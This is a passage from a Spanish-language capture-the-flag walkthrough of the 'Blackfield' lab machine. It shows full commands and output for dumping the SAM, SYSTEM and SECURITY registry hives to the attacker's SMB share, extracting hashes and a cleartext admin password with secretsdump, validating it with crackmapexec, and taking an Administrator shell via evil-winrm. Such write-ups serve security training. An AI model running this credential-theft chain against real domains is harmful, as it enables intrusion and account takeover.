[*] Config file parsed

Haciendo uso de reg podemos hacer un backup y guardarlo en nuestro recurso smb, esto nos crea una copia de la SAM, el SYSTEM y el SECURITY como .save

❯ impacket-reg blackfield.local/svc_backup@dc01.blackfield.local -hashes :9658d1d1dcd9250115e2205d9f48400d backup -o '\\10.10.14.10\kali'  
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SAM to \\10.10.14.10\kali\SAM.save
[*] Saved HKLM\SYSTEM to \\10.10.14.10\kali\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.10.14.10\kali\SECURITY.save

Podemos usar secretsdump para en local dumpear los hashes y credenciales en la SAM y el SECURITY, al hacerlo encontramos una contraseña default en texto claro

❯ impacket-secretsdump LOCAL -system SYSTEM.save -sam SAM.save -security SECURITY.save  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:302a067192e8e4dc10fabe54626803b5319e31023aaa7e7464e6fba9de267088012ceebefcb638d6e8d4eeb5545fb0c886a0262f5f848d19eb8de1b62bd053a008d5c6e1339eb1725249d770253b3695babbd7414562c1d67c1c9eefde69e023e7bd1f360ff02b3acbb3420a28d903ad2eeae6840084d1361329c04607812ede6af5e98e89d12d42dd57957fc03137e3090463b32fc973c25d8a5f539d2acb33e5e8bb4afc8c5958020d4e98293876678167f74dfa8b0f76096b53e197d9cd7823dcf3c43ad58e029ef0b81becb8c08602778a594fe4195594ffde490afbb8a6764bcdedae3348b37d548eb9652e2a74  
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:34886c51472e3da678f41f124d3fd2cc
[*] DefaultPassword 
(Unknown User):###_ADM1N_3920_###
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xd4834e39bca0e657235935730c045b1b9934f690
dpapi_userkey:0x9fa187c3b866f3a77c651559633e2e120bc8ef6f
[*] NL$KM 
 0000   88 01 B2 05 DB 70 7A 0F  EF 52 DF 06 96 76 4C A4   .....pz..R...vL.
 0010   BD 6E 62 D1 06 63 1A 7E  31 2F A2 6D F8 6C 42 50   .nb..c.~1/.m.lBP
 0020   FC 8D 5C A4 FC 46 1B DC  7E CA 7E 76 7F 5E C2 74   ..\..F..~.~v.^.t
 0030   CF EB B6 1F 99 8A 29 CF  2C D1 1D 55 C6 01 2E 6F   ......).,..U...o
NL$KM:8801b205db707a0fef52df0696764ca4bd6e62d106631a7e312fa26df86c4250fc8d5ca4fc461bdc7eca7e767f5ec274cfebb61f998a29cf2cd11d55c6012e6f
[*] Cleaning up...

Esta contraseña en texto claro pertenece al usuario Administrator, al comprobarla usando crackmapexec a nivel de dominio este nos devuelve un Pwn3d!

❯ crackmapexec smb blackfield.local -u Administrator -p ###_ADM1N_3920_###
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\Administrator:###_ADM1N_3920_### (Pwn3d!)

Podemos simplemente conectarnos con evil-winrm como Administrator y ver la flag

❯ evil-winrm -i blackfield.local -u Administrator -p ###_ADM1N_3920_###  
PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
437**************************5cb
PS C:\Users\Administrator\Documents>